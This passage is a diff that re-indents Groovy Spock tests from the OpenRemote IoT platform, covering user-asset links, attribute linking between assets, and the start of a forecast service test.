-                    it.id.assetId == managerTestSetup.apartment1KitchenId &&
-                    it.assetName == "Kitchen 1" &&
-                    it.parentAssetName == "Apartment 1" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1HallwayId &&
-                    it.assetName == "Hallway 1" &&
-                    it.parentAssetName == "Apartment 1" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1Bedroom1Id &&
-                    it.assetName == "Bedroom 1" &&
-                    it.parentAssetName == "Apartment 1" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1BathroomId &&
-                    it.assetName == "Bathroom 1" &&
-                    it.parentAssetName == "Apartment 1" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-
-        when: "all user assets are retrieved of a realm and user"
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, null)
-
-        then: "result should match"
-        userAssetLinks.length == 6
-
-        when: "the realm and user don't match"
-        assetResource.getUserAssetLinks(null, keycloakTestSetup.realmCity.name, keycloakTestSetup.testuser3Id, null)
-
-        then: "an error response should be returned"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "the realm doesn't exist"
-        assetResource.getUserAssetLinks(null, "doesnotexist", keycloakTestSetup.testuser3Id, null)
-
-        then: "an error response should be returned"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "all user assets are retrieved of a realm and user"
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, null, managerTestSetup.apartment1Id)
-
-        then: "result should match"
-        userAssetLinks.length == 1
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1Id &&
-                    it.assetName == "Apartment 1" &&
-                    it.parentAssetName == "Smart building" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-
-        when: "all user assets are retrieved of a realm and user and asset"
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Id)
-
-        then: "result should match"
-        userAssetLinks.length == 1
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1Id &&
-                    it.assetName == "Apartment 1" &&
-                    it.parentAssetName == "Smart building" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-
-        when: "all user assets are retrieved of a realm and user and asset"
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment1Id)
-
-        then: "result should match"
-        userAssetLinks.length == 0
-
-        /* ############################################## WRITE ####################################### */
-
-        when: "an asset is linked to a user"
-        UserAssetLink userAssetLink = new UserAssetLink(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment2Id)
-        assetResource.createUserAssetLinks(null, [userAssetLink])
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, null)
-
-        then: "result should match"
-        userAssetLinks.length == 1
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser2Id &&
-                    it.id.assetId == managerTestSetup.apartment2Id &&
-                    it.assetName == "Apartment 2" &&
-                    it.parentAssetName == "Smart building" &&
-                    it.userFullName == "testuser2 (DemoA2 DemoLast)" &&
-                    it.createdOn.toEpochMilli() <= timerService.currentTimeMillis
-        }
-
-        when: "an asset link is deleted"
-        assetResource.deleteUserAssetLink(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment2Id)
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, null)
-
-        then: "result should match"
-        userAssetLinks.length == 0
-
-        when: "all of a user assets are deleted"
-        assetResource.deleteAllUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
-        userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, null)
-
-        then: "result should match"
-        userAssetLinks.length == 0
+    then: "result should match"
+    userAssetLinks.length == 13
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1Id &&
+      it.assetName == "Apartment 1" &&
+      it.parentAssetName == "Smart building" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
     }
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1LivingroomId &&
+      it.assetName == "Living Room 1" &&
+      it.parentAssetName == "Apartment 1" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1KitchenId &&
+      it.assetName == "Kitchen 1" &&
+      it.parentAssetName == "Apartment 1" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1HallwayId &&
+      it.assetName == "Hallway 1" &&
+      it.parentAssetName == "Apartment 1" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1Bedroom1Id &&
+      it.assetName == "Bedroom 1" &&
+      it.parentAssetName == "Apartment 1" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1BathroomId &&
+      it.assetName == "Bathroom 1" &&
+      it.parentAssetName == "Apartment 1" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+
+    when: "all user assets are retrieved of a realm and user"
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, null)
+
+    then: "result should match"
+    userAssetLinks.length == 6
+
+    when: "the realm and user don't match"
+    assetResource.getUserAssetLinks(null, keycloakTestSetup.realmCity.name, keycloakTestSetup.testuser3Id, null)
+
+    then: "an error response should be returned"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "the realm doesn't exist"
+    assetResource.getUserAssetLinks(null, "doesnotexist", keycloakTestSetup.testuser3Id, null)
+
+    then: "an error response should be returned"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "all user assets are retrieved of a realm and user"
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, null, managerTestSetup.apartment1Id)
+
+    then: "result should match"
+    userAssetLinks.length == 1
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1Id &&
+      it.assetName == "Apartment 1" &&
+      it.parentAssetName == "Smart building" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+
+    when: "all user assets are retrieved of a realm and user and asset"
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Id)
+
+    then: "result should match"
+    userAssetLinks.length == 1
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser3Id &&
+      it.id.assetId == managerTestSetup.apartment1Id &&
+      it.assetName == "Apartment 1" &&
+      it.parentAssetName == "Smart building" &&
+      it.userFullName == "testuser3 (DemoA3 DemoLast)"
+    }
+
+    when: "all user assets are retrieved of a realm and user and asset"
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment1Id)
+
+    then: "result should match"
+    userAssetLinks.length == 0
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "an asset is linked to a user"
+    UserAssetLink userAssetLink = new UserAssetLink(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment2Id)
+    assetResource.createUserAssetLinks(null, [userAssetLink])
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, null)
+
+    then: "result should match"
+    userAssetLinks.length == 1
+    userAssetLinks.any {
+      it.id.realm == keycloakTestSetup.realmBuilding.name &&
+      it.id.userId == keycloakTestSetup.testuser2Id &&
+      it.id.assetId == managerTestSetup.apartment2Id &&
+      it.assetName == "Apartment 2" &&
+      it.parentAssetName == "Smart building" &&
+      it.userFullName == "testuser2 (DemoA2 DemoLast)" &&
+      it.createdOn.toEpochMilli() <= timerService.currentTimeMillis
+    }
+
+    when: "an asset link is deleted"
+    assetResource.deleteUserAssetLink(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, managerTestSetup.apartment2Id)
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, null)
+
+    then: "result should match"
+    userAssetLinks.length == 0
+
+    when: "all of a user assets are deleted"
+    assetResource.deleteAllUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
+    userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, null)
+
+    then: "result should match"
+    userAssetLinks.length == 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AttributeLinkingTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AttributeLinkingTest.groovy
@@ -40,209 +40,206 @@ import static org.openremote.model.value.MetaItemType.*
 
 class AttributeLinkingTest extends Specification implements ManagerContainerTrait {
 
-    def "Check processing of asset attributes that are linked to other attributes"() {
+  def "Check processing of asset attributes that are linked to other attributes"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        when: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    when: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
 
-        then: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 300)
-        }
+    then: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 300)
+    }
 
-        when: "assets are created"
-        def asset1 = new ThingAsset("Asset 1")
-        asset1.setRealm(Constants.MASTER_REALM)
-        asset1.addOrReplaceAttributes(
+    when: "assets are created"
+    def asset1 = new ThingAsset("Asset 1")
+    asset1.setRealm(Constants.MASTER_REALM)
+    asset1.addOrReplaceAttributes(
             new Attribute<>("button", TEXT, "RELEASED"),
             new Attribute<>("array", null, null),
             new Attribute<>("crossRealm", TEXT, null)
-        )
-        asset1 = assetStorageService.merge(asset1)
+            )
+    asset1 = assetStorageService.merge(asset1)
 
-        def asset2 = new ThingAsset("Asset 2")
+    def asset2 = new ThingAsset("Asset 2")
             .setRealm(Constants.MASTER_REALM)
             .addOrReplaceAttributes(
             new Attribute<>("lightOnOff", BOOLEAN, false),
             new Attribute<>("counter", NUMBER, 0d),
             new Attribute<>("item2Prop1", BOOLEAN, null)
-        )
-        asset2 = assetStorageService.merge(asset2)
+            )
+    asset2 = assetStorageService.merge(asset2)
 
-        then: "the assets should be saved to the DB"
-        assert asset1.id != null
-        assert asset2.id != null
+    then: "the assets should be saved to the DB"
+    assert asset1.id != null
+    assert asset2.id != null
 
-        when: "attributes from one asset is linked to attributes on the other"
-        def converterOnOff = Map.of(
-                "PRESSED", "@TOGGLE",
-                "RELEASED", "@IGNORE",
-                "LONG_PRESSED", "@IGNORE"
-        )
-        def attributeLinkOnOff = new AttributeLink(new AttributeRef(asset2.id, "lightOnOff"), converterOnOff, null)
+    when: "attributes from one asset is linked to attributes on the other"
+    def converterOnOff = Map.of(
+            "PRESSED", "@TOGGLE",
+            "RELEASED", "@IGNORE",
+            "LONG_PRESSED", "@IGNORE"
+            )
+    def attributeLinkOnOff = new AttributeLink(new AttributeRef(asset2.id, "lightOnOff"), converterOnOff, null)
 
-        def converterCounter = Map.of(
-                "PRESSED", "@INCREMENT",
-                "RELEASED", "@DECREMENT",
-                "LONG_PRESSED", "@IGNORE"
-        )
-        def attributeLinkCounter = new AttributeLink(new AttributeRef(asset2.id, "counter"), converterCounter, null)
+    def converterCounter = Map.of(
+            "PRESSED", "@INCREMENT",
+            "RELEASED", "@DECREMENT",
+            "LONG_PRESSED", "@IGNORE"
+            )
+    def attributeLinkCounter = new AttributeLink(new AttributeRef(asset2.id, "counter"), converterCounter, null)
 
-        def attributeLinkProp = new AttributeLink(new AttributeRef(asset2.id, "item2Prop1"), null, [
-            new JsonPathFilter("\$[1].prop1", true, false)
-        ] as ValueFilter[])
+    def attributeLinkProp = new AttributeLink(new AttributeRef(asset2.id, "item2Prop1"), null, [new JsonPathFilter("\$[1].prop1", true, false)] as ValueFilter[])
 
-        asset1.getAttribute("button").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [attributeLinkOnOff, attributeLinkCounter] as AttributeLink[]))
-        asset1.getAttribute("array").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [attributeLinkProp] as AttributeLink[]))
-        asset1.getAttribute("crossRealm").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [new AttributeLink(new AttributeRef(managerTestSetup.apartment1Id, BuildingAsset.STREET.name), null, null)] as AttributeLink[]))
-        asset1 = assetStorageService.merge(asset1)
+    asset1.getAttribute("button").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [attributeLinkOnOff, attributeLinkCounter] as AttributeLink[]))
+    asset1.getAttribute("array").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [attributeLinkProp] as AttributeLink[]))
+    asset1.getAttribute("crossRealm").get().addMeta(new MetaItem<>(ATTRIBUTE_LINKS, [
+      new AttributeLink(new AttributeRef(managerTestSetup.apartment1Id, BuildingAsset.STREET.name), null, null)
+    ] as AttributeLink[]))
+    asset1 = assetStorageService.merge(asset1)
 
-        and: "the button is pressed for a short period"
-        def buttonPressed = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonPressed)
-        Thread.sleep(200)
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        def buttonReleased = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonReleased)
-
-        then: "the linked attribute value should be toggled on"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
-        }
-
-        when: "the button is pressed again for a short period"
-        buttonPressed = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonPressed)
-        Thread.sleep(200)
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        buttonReleased = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonReleased)
-
-        then: "the linked attribute value should be toggled off"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert !asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
-        }
-        when: "a long button press occurs"
-        def buttonLongPressed = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "LONG_PRESSED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonLongPressed)
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        buttonReleased = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonReleased)
-
-        then: "the linked attribute value should not have changed and the system has settled down"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert !asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
-
-        // Need to reset counter due to synchronisation issues (ideally counter would still be at 0 as
-        // each press event had a corresponding release event)
-        when: "the counter is reset"
-        def attr = asset2.getAttribute("counter").get()
-        attr.setValue(0.0)
-        asset2.addOrReplaceAttributes(attr)
-        asset2 = assetStorageService.merge(asset2)
-
-        and: "A button press event occurs without a release event"
-        buttonPressed = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonPressed)
-
-        then: "the counter should increment"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert asset2.getAttribute("counter").flatMap{it.value}.orElse(0d) == 1.0
-        }
-
-        when: "A button release event occur"
-        buttonReleased = new AttributeEvent(
-                new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonReleased)
-
-        then: "the counter should decrement"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert asset2.getAttribute("counter").flatMap{it.value}.orElse(0d) == 0.0
-        }
-
-        /* TODO Test has timing issues, fails in line 182 when run from CLI gradle clean build, works in IDE!
-        when: "the linked attribute is linked back to the source attribute (to create circular reference)"
-        def converterLoop = ValueUtil.createObjectMap()
-        converterLoop.put("TRUE", "PRESSED")
-        converterLoop.put("FALSE", "PRESSED")
-        def attributeLinkLoop = ValueUtil.createObjectMap()
-        attributeLinkLoop.put("ref", new AttributeRef(asset1.id, "button"))
-        attributeLinkLoop.put("converter", converterLoop)
-        asset2.getAttribute("lightOnOff").get().addMeta(new MetaItem<>(AssetMeta.ATTRIBUTE_LINK, attributeLinkLoop))
-        asset2 = assetStorageService.merge(asset2)
-
-        and: "the button is pressed for a short period"
-        buttonPressed = new AttributeEvent(
+    and: "the button is pressed for a short period"
+    def buttonPressed = new AttributeEvent(
             new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonPressed)
-        Thread.sleep(10)
-        buttonReleased = new AttributeEvent(
+            )
+    assetProcessingService.sendAttributeEvent(buttonPressed)
+    Thread.sleep(200)
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    def buttonReleased = new AttributeEvent(
             new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
-        )
-        assetProcessingService.sendAttributeEvent(buttonReleased)
+            )
+    assetProcessingService.sendAttributeEvent(buttonReleased)
 
-        then: "the linked attribute value should be toggled on"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
-        }
-
-        and: "no more events should be processed"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
-        */
-
-        when: "the array attribute is written to"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, "array", ValueUtil.parse("[{\"prop1\": true, \"prop2\": \"a\"},{\"prop1\": false, \"prop2\": \"b\"}]").orElse(null)))
-
-        then: "the linked attribute on the other asset should contain the value from the json path"
-        conditions.eventually {
-            asset2 = assetStorageService.find(asset2.id, true)
-            assert !asset2.getAttribute("item2Prop1").flatMap{it.value}.orElse(true)
-        }
-
-        when: "the crossRealm attribute is written to"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, "crossRealm", "Test"))
-
-        then: "the source attribute should be updated"
-        conditions.eventually {
-            asset1 = assetStorageService.find(asset1.id, true)
-            assert asset1.getAttribute("crossRealm").flatMap{it.value}.orElse(null) == "Test"
-        }
-
-        and: "the cross realm asset attribute should not have been updated after a short wait"
-        Thread.sleep(1000)
-        def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true) as BuildingAsset
-        assert apartment1.getStreet().orElse(null) == null
+    then: "the linked attribute value should be toggled on"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
     }
+
+    when: "the button is pressed again for a short period"
+    buttonPressed = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonPressed)
+    Thread.sleep(200)
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    buttonReleased = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonReleased)
+
+    then: "the linked attribute value should be toggled off"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert !asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
+    }
+    when: "a long button press occurs"
+    def buttonLongPressed = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "LONG_PRESSED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonLongPressed)
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    buttonReleased = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonReleased)
+
+    then: "the linked attribute value should not have changed and the system has settled down"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert !asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
+      assert noEventProcessedIn(assetProcessingService, 500)
+    }
+
+    // Need to reset counter due to synchronisation issues (ideally counter would still be at 0 as
+    // each press event had a corresponding release event)
+    when: "the counter is reset"
+    def attr = asset2.getAttribute("counter").get()
+    attr.setValue(0.0)
+    asset2.addOrReplaceAttributes(attr)
+    asset2 = assetStorageService.merge(asset2)
+
+    and: "A button press event occurs without a release event"
+    buttonPressed = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonPressed)
+
+    then: "the counter should increment"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert asset2.getAttribute("counter").flatMap{it.value}.orElse(0d) == 1.0
+    }
+
+    when: "A button release event occur"
+    buttonReleased = new AttributeEvent(
+            new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
+            )
+    assetProcessingService.sendAttributeEvent(buttonReleased)
+
+    then: "the counter should decrement"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert asset2.getAttribute("counter").flatMap{it.value}.orElse(0d) == 0.0
+    }
+
+    /* TODO Test has timing issues, fails in line 182 when run from CLI gradle clean build, works in IDE!
+     when: "the linked attribute is linked back to the source attribute (to create circular reference)"
+     def converterLoop = ValueUtil.createObjectMap()
+     converterLoop.put("TRUE", "PRESSED")
+     converterLoop.put("FALSE", "PRESSED")
+     def attributeLinkLoop = ValueUtil.createObjectMap()
+     attributeLinkLoop.put("ref", new AttributeRef(asset1.id, "button"))
+     attributeLinkLoop.put("converter", converterLoop)
+     asset2.getAttribute("lightOnOff").get().addMeta(new MetaItem<>(AssetMeta.ATTRIBUTE_LINK, attributeLinkLoop))
+     asset2 = assetStorageService.merge(asset2)
+     and: "the button is pressed for a short period"
+     buttonPressed = new AttributeEvent(
+     new AttributeState(new AttributeRef(asset1.id, "button"), "PRESSED")
+     )
+     assetProcessingService.sendAttributeEvent(buttonPressed)
+     Thread.sleep(10)
+     buttonReleased = new AttributeEvent(
+     new AttributeState(new AttributeRef(asset1.id, "button"), "RELEASED")
+     )
+     assetProcessingService.sendAttributeEvent(buttonReleased)
+     then: "the linked attribute value should be toggled on"
+     conditions.eventually {
+     asset2 = assetStorageService.find(asset2.id, true)
+     assert asset2.getAttribute("lightOnOff").flatMap{it.value}.orElse(false)
+     }
+     and: "no more events should be processed"
+     conditions.eventually {
+     assert noEventProcessedIn(assetProcessingService, 500)
+     }
+     */
+
+    when: "the array attribute is written to"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, "array", ValueUtil.parse("[{\"prop1\": true, \"prop2\": \"a\"},{\"prop1\": false, \"prop2\": \"b\"}]").orElse(null)))
+
+    then: "the linked attribute on the other asset should contain the value from the json path"
+    conditions.eventually {
+      asset2 = assetStorageService.find(asset2.id, true)
+      assert !asset2.getAttribute("item2Prop1").flatMap{it.value}.orElse(true)
+    }
+
+    when: "the crossRealm attribute is written to"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, "crossRealm", "Test"))
+
+    then: "the source attribute should be updated"
+    conditions.eventually {
+      asset1 = assetStorageService.find(asset1.id, true)
+      assert asset1.getAttribute("crossRealm").flatMap{it.value}.orElse(null) == "Test"
+    }
+
+    and: "the cross realm asset attribute should not have been updated after a short wait"
+    Thread.sleep(1000)
+    def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true) as BuildingAsset
+    assert apartment1.getStreet().orElse(null) == null
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/ForecastServiceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/ForecastServiceTest.groovy
@@ -52,282 +52,280 @@ import static spock.util.matcher.HamcrestMatchers.closeTo
 
 class ForecastServiceTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static ManagerTestSetup managerTestSetup
-    @Shared
-    static AssetPredictedDatapointService assetPredictedDatapointService
-    @Shared
-    static AssetStorageService assetStorageService
-    @Shared
-    static AssetDatapointService assetDatapointService
-    @Shared
-    static ForecastService forecastService
-    @Shared
-    static TimerService timerService
-    @Shared
-    static ForecastConfigurationWeightedExponentialAverage forecastConfig = new ForecastConfigurationWeightedExponentialAverage(
-            new TimeUtil.ExtendedPeriodAndDuration("P7D"),
-            3,
-            new TimeUtil.ExtendedPeriodAndDuration("PT1H"),
-            4
-    )
-    @Shared
-    // Outer list is hours
-    // Inner list is weekly values
-    static double[][] forecastHistoricalData = [
-            [4.0, 3.0, 2.0],
-            [4.1, 3.1, 2.1],
-            [4.2, 3.2, 2.2],
-            [4.3, 3.3, 2.3],
-            [4.4, 3.4, 2.4]
-    ]
-    @Shared
-    static ThingAsset forecastThing2
-    @Shared
-    static String forecastAttributeName = "forecastAttribute"
+  @Shared
+  static ManagerTestSetup managerTestSetup
+  @Shared
+  static AssetPredictedDatapointService assetPredictedDatapointService
+  @Shared
+  static AssetStorageService assetStorageService
+  @Shared
+  static AssetDatapointService assetDatapointService
+  @Shared
+  static ForecastService forecastService
+  @Shared
+  static TimerService timerService
+  @Shared
+  static ForecastConfigurationWeightedExponentialAverage forecastConfig = new ForecastConfigurationWeightedExponentialAverage(
+  new TimeUtil.ExtendedPeriodAndDuration("P7D"),
+  3,
+  new TimeUtil.ExtendedPeriodAndDuration("PT1H"),
+  4
+  )
+  @Shared
+  // Outer list is hours
+  // Inner list is weekly values
+  static double[][] forecastHistoricalData = [
+    [4.0, 3.0, 2.0],
+    [4.1, 3.1, 2.1],
+    [4.2, 3.2, 2.2],
+    [4.3, 3.3, 2.3],
+    [4.4, 3.4, 2.4]
+  ]
+  @Shared
+  static ThingAsset forecastThing2
+  @Shared
+  static String forecastAttributeName = "forecastAttribute"
 
-    // TODO: RT - Not too sure the intention with the offset and seems to be used only in ignored tests so skip for now
-//    def setupSpec() {
-//        forecastThing2 = addForecastAsset(assetStorageService, managerTestSetup.realmMasterName, forecastAttributeName, forecastConfig)
-//        Long offset = ((forecastConfig.getForecastPeriod().toMillis() * 2) / 3) * (-1)
-//        insertHistoryTestDataToDb(new AttributeRef(forecastThing2.id, forecastAttributeName), forecastHistoricalData, offset, forecastConfig)
-//
-//        // Insert forecast test data
-//        assetPredictedDatapointService.updateValues(forecastThing2.id, forecastAttributeName, [
